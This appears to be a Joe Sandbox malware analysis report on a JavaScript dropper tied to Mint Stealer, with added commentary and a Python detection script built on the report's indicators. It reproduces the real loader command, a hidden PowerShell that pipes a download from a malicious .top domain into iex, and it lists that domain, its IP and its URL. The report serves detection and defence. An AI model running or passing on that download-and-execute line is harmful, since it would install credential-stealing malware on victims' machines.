              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Note: 922337203685477 ms is Int64.MaxValue taken as 100 ns ticks and converted to milliseconds, i.e. .NET's TimeSpan.MaxValue; a sleep of that length effectively never returns, which is a common way to stall a sandbox until its time budget runs out.
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4260
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5587
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776 | Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.1570309617.0000027957BF7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

              barindex
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex" (reported twice)
This single command line is the whole first-stage loader: wscript.exe starts Windows PowerShell with profile loading disabled, the execution policy bypassed and the window hidden. In Windows PowerShell 5.1, curl is an alias of Invoke-WebRequest, so the body served by http://nzy3tvbb72g3.top/1.php?s=mints13 is piped straight into Invoke-Expression (iex) and executed in memory; the cradle itself never writes a script file to disk, so the process creation event and the outbound HTTP request are the artefacts to hunt for.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (6 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a stable per-machine value that malware commonly reads to derive a victim identifier)
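The process chain above (a scripting host spawning PowerShell with -executionpolicy bypass, a hidden window, a download cradle and iex) and the network indicators in the tables further down are exactly what a detection should key on. The following is an added example, not Joe Sandbox's code and not part of this report: it scores Sysmon-style process-creation records and checks proxy-log URLs against the report's IOCs. The field names (Image, ParentImage, CommandLine) follow Sysmon Event ID 1; the benign events, the proxy lines, the client addresses and the verdict thresholds are my own constructions, while the malicious command line, domain, IP and URL are copied from the report.

```python
# Detection logic for the wscript.exe -> powershell.exe download cradle seen in this report.
# Added example (not Joe Sandbox's code). Events and proxy lines are constructed to resemble
# Sysmon Event ID 1 and web-proxy records; only the malicious command line, domain, IP and
# URL are taken from the report.
import re
from urllib.parse import urlparse

# Network IOCs copied from the report's domain, IP and URL tables.
REPORT_IOCS = {
    "urls": {"http://nzy3tvbb72g3.top/1.php?s=mints13"},
    "domains": {"nzy3tvbb72g3.top"},
    "ips": {"206.188.196.219"},
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Each token is weak on its own (admins use -ExecutionPolicy Bypass too); the combination
# under a scripting-host parent is what this report shows.
TOKENS = {
    # powershell.exe accepts any unambiguous prefix of -ExecutionPolicy (-ep, -ex, -exec, ...).
    "execution_policy_bypass": re.compile(r"-e(?:p|x|xec|xecutionpolicy)\s+(?:bypass|unrestricted)", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    # In Windows PowerShell 5.1, curl and wget are aliases of Invoke-WebRequest.
    "download_cradle": re.compile(
        r"\b(?:curl|wget|iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}
RE_URL = re.compile(r"https?://[^\s\"'|<>]+", re.I)

def basename(path):
    """Image name without directory, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def ioc_matches(url):
    """IOC kinds a URL hits: the exact URL, its host as a domain, or its host as an IP."""
    host = (urlparse(url).hostname or "").lower()
    checks = (("url", url in REPORT_IOCS["urls"]), ("domain", host in REPORT_IOCS["domains"]),
              ("ip", host in REPORT_IOCS["ips"]))
    return [kind for kind, hit in checks if hit]

def analyze(event):
    """Score one process-creation event: verdict, matched tokens, URLs and IOC hits."""
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    findings = []
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            findings.append("script_host_spawns_powershell")
        findings += [name for name, rx in TOKENS.items() if rx.search(cmd)]
    urls = RE_URL.findall(cmd)
    ioc_hits = {u: ioc_matches(u) for u in urls if ioc_matches(u)}
    chain = {"script_host_spawns_powershell", "download_cradle", "invoke_expression"}
    if ioc_hits or chain <= set(findings):
        verdict = "malicious"   # a known IOC, or the complete fetch-and-eval chain
    elif len(findings) >= 2:
        verdict = "suspicious"
    elif findings:
        verdict = "low"         # one weak token, e.g. an admin's -ep bypass for a local script
    else:
        verdict = "benign"
    return {"verdict": verdict, "findings": findings, "urls": urls, "ioc_hits": ioc_hits}

def scan_proxy_log(lines):
    """(client, url, ioc_kinds) for every proxy-log line that touches a report IOC."""
    hits = []
    for line in lines:
        client = line.split()[1]
        for url in RE_URL.findall(line):
            kinds = ioc_matches(url)
            if kinds:
                hits.append((client, url, kinds))
    return hits

def ev(parent, cmd):
    """Minimal Sysmon-style process-creation record (constructed)."""
    return {"ParentImage": parent, "Image": PS_PATH, "CommandLine": cmd}

# Constructed events; the first carries the command line observed in the report verbatim.
SAMPLE_EVENTS = [
    ev(r"C:\Windows\System32\wscript.exe",
       r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass '
       r'-WindowStyle hidden -C " curl http://nzy3tvbb72g3.top/1.php?s=mints13 |iex"'),
    ev(r"C:\Windows\explorer.exe", r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    ev(r"C:\Windows\System32\cmd.exe", "powershell.exe -Command Get-Process"),
]

# Constructed proxy-log lines: timestamp, client, method, URL.
PROXY_LOG = [
    "2025-01-20T10:55:01Z 10.0.0.12 GET http://www.google.com/",
    "2025-01-20T10:55:02Z 10.0.0.12 GET http://nzy3tvbb72g3.top/1.php?s=mints13",
    "2025-01-20T10:56:40Z 10.0.0.31 GET https://www.apache.org/licenses/LICENSE-2.0",
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(analyze(e)["verdict"], analyze(e)["findings"])
    print(scan_proxy_log(PROXY_LOG))
```

Running the script labels the report's command line malicious on the chain alone, before the IOC match is even consulted, while the admin's -ExecutionPolicy Bypass -File invocation only scores "low"; that separation is the point of requiring the scripting-host parent plus cradle plus iex rather than alerting on the policy bypass by itself. The token list deliberately ignores -EncodedCommand and the abbreviated -e form, which a production rule would need to decode and cover separately.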

              Stealing of Sensitive Information

              barindex
Source: Yara match | File source: amsi64_7456.amsi.csv, type: OTHER
Source: Yara match | File source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7456, type: MEMORYSTR

              Remote Access Functionality

              barindex
Source: Yara match | File source: amsi64_7456.amsi.csv, type: OTHER
Source: Yara match | File source: 00000000.00000003.1499672307.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500335199.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500163574.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1499012379.0000023BD7E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1497822366.0000023BD9C3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1500383727.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1506269104.0000023BD7F16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: wscript.exe PID: 7456, type: MEMORYSTR
MITRE ATT&CK Matrix (rebuilt from the flattened 14-column table, listed per tactic). Digits in front of a technique are the superscript counters Joe Sandbox renders beside it, reproduced as they appear; entries without a counter are the matrix's default placeholder cells, not behaviour observed for this sample.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: 42 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Exploitation for Client Execution; 3 PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: 42 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 1 File Deletion; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 12 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Antivirus detection for the submitted file:
Source | Detection | Scanner | Label
FM5vWQHpqe.js | 20% | Virustotal | -
FM5vWQHpqe.js | 8% | ReversingLabs | Text.Malware.Boxter
No Antivirus matches (remaining three scan tables)

Antivirus detection for URLs:
Source | Detection | Scanner | Label
http://nzy3tvbb72g3.top/1.php?s=mints13 | 100% | Avira URL Cloud | malware
http://nzy3tvbb72g3.top | 100% | Avira URL Cloud | malware
Contacted domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
nzy3tvbb72g3.top | 206.188.196.219 | true | false | - | high
www.google.com | 142.250.185.68 | true | false | - | high
Note that the domain row carries Malicious: false and a "high" reputation even though the URL it serves is flagged below; treat the domain as an indicator regardless of the per-domain verdict.

Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://nzy3tvbb72g3.top/1.php?s=mints13 | true | Avira URL Cloud: malware | unknown
http://www.google.com/ | false | - | high
URLs found in process memory and binaries. Sources are powershell.exe memory dumps named 00000002.00000002.<dump>.<address>.00000004.00000800.00020000.00000000.sdmp; each row lists them as <dump>.<address>. The google.com entries are consistent with the HTTP request to www.google.com on port 80 noted in the signatures; the Pester, NuGet, OneGet, contoso.com and aka.ms strings are part of the PowerShell modules shipped with Windows and are not indicators.
Name | Malicious | Antivirus Detection | Reputation | Sources
https://play.google.com/?hl=en&tab=w8 | false | - | high | 1550248650.00000279402E9000
http://nuget.org/NuGet.exe | false | - | high | 1550248650.0000027941258000, 1565751136.000002794F912000
http://www.apache.org/licenses/LICENSE-2.0 | false | - | high | 1550248650.0000027940ED7000
https://www.google.com/imghp?hl=en&tab=wi | false | - | high | 1550248650.00000279402E9000
https://www.google.com/shopping?hl=en&source=og&tab=wf | false | - | high | 1550248650.00000279402E9000
https://lh3.googleusercontent.com/ogw/default-user=s96 | false | - | high | 1550248650.000002793FC42000, 1565751136.000002794FB9B000, 1565751136.000002794F8B0000, 1550248650.000002793FC5E000, 1550248650.0000027940E8D000, 1565751136.000002794F912000, 1550248650.0000027940ED7000
http://pesterbdd.com/images/Pester.png | false | - | high | 1550248650.00000279410E2000, 1550248650.0000027940ED7000
http://www.apache.org/licenses/LICENSE-2.0.html | false | - | high | 1550248650.00000279410E2000, 1550248650.0000027940ED7000
https://photos.google.com/?tab=wq&pageId=none | false | - | high | 1550248650.00000279402E9000
http://www.google.com/preferences?hl=enX | false | - | high | 1550248650.00000279402E9000
https://csp.withgoogle.com/csp/gws/other-hp | false | - | high | 1550248650.0000027940E71000, 1550248650.000002793FC5E000, 1550248650.000002793FC2C000, 1565751136.000002794F912000, 1550248650.0000027940ED7000
https://drive.google.com/?tab=wo | false | - | high | 1550248650.00000279402E9000
https://contoso.com/License | false | - | high | 1565751136.000002794F912000
https://contoso.com/Icon | false | - | high | 1565751136.000002794F912000
https://news.google.com/?tab=wn | false | - | high | 1550248650.00000279402E9000
https://mail.google.com/mail/?tab=wm | false | - | high | 1550248650.00000279402E9000
https://docs.google.com/document/?usp=docs_alc | false | - | high | 1550248650.00000279402E9000
http://www.google.com/preferences?hl=en | false | - | high | 1550248650.0000027940E8D000
https://github.com/Pester/Pester | false | - | high | 1550248650.00000279410E2000, 1550248650.0000027940ED7000
http://schema.org/WebPage | false | - | high | 1550248650.0000027940E8D000, 1550248650.0000027940B41000, 1550248650.0000027940B47000, 1550248650.000002794079C000, 1550248650.0000027940B28000, 1565751136.000002794F912000, 1550248650.00000279407B5000, 1550248650.0000027940ED7000, 1550248650.00000279407AF000, 1550248650.0000027940B54000, 1550248650.0000027940B5B000
https://www.youtube.com/?tab=w1 | false | - | high | 1550248650.00000279402E9000
https://www.google.com/webhp?tab=ww | false | - | high | 1550248650.00000279402E9000
https://lh3.googleusercontent.com/ogw/default-user=s96X | false | - | high | 1550248650.00000279402E9000
https://lh3.googleusercontent.com/ogw/default-user=s24 | false | - | high | 1550248650.0000027940ED7000
http://www.google.com/history/optout?hl=en | false | - | high | 1550248650.00000279402E9000, 1550248650.0000027940E8D000
https://books.google.com/?hl=en&tab=wp | false | - | high | 1550248650.00000279402E9000
https://www.google.com/logos/doodles/2025/dr-martin-luther-king-jr-day-2025-6753651837110587.2-2x.pn | false | - | high | 1550248650.0000027940B5B000
https://translate.google.com/?hl=en&tab=wT | false | - | high | 1550248650.00000279402E9000
http://schema.org/WebPageX | false | - | high | 1550248650.000002793FC5E000
https://contoso.com/ | false | - | high | 1565751136.000002794F912000
https://nuget.org/nuget.exe | false | - | high | 1550248650.0000027941258000, 1565751136.000002794F912000
https://www.google.com/finance?tab=we | false | - | high | 1550248650.00000279402E9000
https://www.google.com/intl/en/about/products?tab=whX | false | - | high | 1550248650.00000279402E9000
http://maps.google.com/maps?hl=en&tab=wl | false | - | high | 1550248650.00000279402E9000
https://oneget.orgX | false | - | high | 1550248650.0000027940ED7000
http://www.google.com | false | - | high | 1550248650.0000027940E71000, 1550248650.000002793FC2C000, 1550248650.0000027940E8D000
https://calendar.google.com/calendar?tab=wc | false | - | high | 1550248650.00000279402E9000
https://aka.ms/pscore68 | false | - | high | 1550248650.000002793F8A1000
https://apis.google.com | false | - | high | 1550248650.000002793FC42000, 1565751136.000002794FB9B000, 1565751136.000002794F8B0000, 1550248650.000002793FC5E000, 1550248650.000002793FDB9000, 1550248650.0000027940E8D000, 1565751136.000002794F912000, 1550248650.0000027940ED7000
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | false | - | high | 1550248650.000002793F8A1000
http://www.blogger.com/?tab=wj | false | - | high | 1550248650.00000279402E9000
http://nzy3tvbb72g3.top | true | Avira URL Cloud: malware | unknown | 1550248650.000002793FAC2000, 1550248650.0000027940E71000, 1550248650.0000027940BD7000
https://lh3.googleusercontent.com/ogw/default-user=s24X | false | - | high | 1550248650.000002793FDB9000
https://oneget.org | false | - | high | 1550248650.0000027940ED7000
http://www.google.com/mobile/?hl=en&tab=wD | false | - | high | 1550248650.00000279402E9000
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.185.68 | www.google.com | United States | 15169 | GOOGLEUS | false
206.188.196.219 | nzy3tvbb72g3.top | United States | 55002 | DEFENSE-NETUS | false
                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                            Analysis ID:1595057
                                                                                                            Start date and time:2025-01-20 11:54:43 +01:00
                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                            Overall analysis duration:0h 3m 25s
                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                            Report type:full
                                                                                                            Cookbook file name:default.jbs
                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                                                                                                            Number of new started drivers analysed:0
                                                                                                            Number of existing processes analysed:0
                                                                                                            Number of existing drivers analysed:0
                                                                                                            Number of injected processes analysed:0
                                                                                                            Technologies:
                                                                                                            • HCA enabled
                                                                                                            • EGA enabled
                                                                                                            • GSI enabled (Javascript)
                                                                                                            • AMSI enabled
                                                                                                            Analysis Mode:default
                                                                                                            Analysis stop reason:Timeout
                                                                                                            Sample name:FM5vWQHpqe.js
                                                                                                            renamed because original name is a hash value
                                                                                                            Original Sample Name:24c03cb37e48b5810f40fdd69acb290d67dbfd003bef5c21cf23b1d210a0faa1.js
                                                                                                            Detection:MAL
                                                                                                            Classification:mal100.troj.expl.evad.winJS@4/5@2/2
                                                                                                            EGA Information:Failed
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            • Number of executed functions: 2
                                                                                                            • Number of non-executed functions: 5
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .js
                                                                                                            • Stop behavior analysis, all processes terminated
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7580 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:55:48 | API Interceptor | 27x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
206.188.196.219 | xIIjYxLdOP.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
206.188.196.219 | gnwVi8pjnN.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
206.188.196.219 | naBQQL40Av.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
206.188.196.219 | 9McbmtkQB6.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
206.188.196.219 | gPTn2cWymy.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
206.188.196.219 | Fattura82924748.js | malicious | Mint Stealer | nzy3tvbb72g3.top/1.php?s=mints13
Match | Associated Sample Name / URL | Detection | Threat Name | Context
nzy3tvbb72g3.top | xIIjYxLdOP.js | malicious | Mint Stealer | 206.188.196.219
nzy3tvbb72g3.top | gnwVi8pjnN.js | malicious | Mint Stealer | 206.188.196.219
nzy3tvbb72g3.top | naBQQL40Av.js | malicious | Mint Stealer | 206.188.196.219
nzy3tvbb72g3.top | 9McbmtkQB6.js | malicious | Mint Stealer | 206.188.196.219
nzy3tvbb72g3.top | gPTn2cWymy.js | malicious | Mint Stealer | 206.188.196.219
nzy3tvbb72g3.top | Fattura82924748.js | malicious | Mint Stealer | 206.188.196.219
Match | Associated Sample Name / URL | Detection | Threat Name | Context
DEFENSE-NETUS | xIIjYxLdOP.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | gnwVi8pjnN.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | naBQQL40Av.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | 9McbmtkQB6.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | gPTn2cWymy.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | Fattura82924748.js | malicious | Mint Stealer | 206.188.196.219
DEFENSE-NETUS | https://neat-lydian-copper.glitch.me/ | malicious | HTMLPhisher | 205.178.189.131
DEFENSE-NETUS | https://1143b54.wcomhost.com/ | malicious | Unknown | 206.188.192.6
DEFENSE-NETUS | leUmNO9XPu.exe | malicious | HawkEye, MailPassView | 207.204.50.48
DEFENSE-NETUS | OH6KO8NBy1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 206.188.197.24
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):1.1940658735648508
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlllulbnolz:NllUc
                                                                                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:@...e................................................@..........
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):6222
                                                                                                            Entropy (8bit):3.731333292207573
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:KxyDdCRP8aKkvhkvCCtCMKgQCHEofYKgQHHEofr:K0D0PCCMKOwK1T
                                                                                                            MD5:EB513B8049AA7E3D8E0050E2EE4FA5C4
                                                                                                            SHA1:F97FB07462A2D9A8269937C55AE8E2AD7DA690FF
                                                                                                            SHA-256:30A421AE35AC64892106EF584FFBCA202FDA039C8DF1C2248E0D5954D43FB4B5
                                                                                                            SHA-512:BD3FA57EEDD1D3829FE5CAF42167CAB67F38C06CE683936E7BA08DAB3E0AB71C42830211973EF2556B5BE66C7DAF6D3FE229E89CF17307A2007EF7BA51692A6A
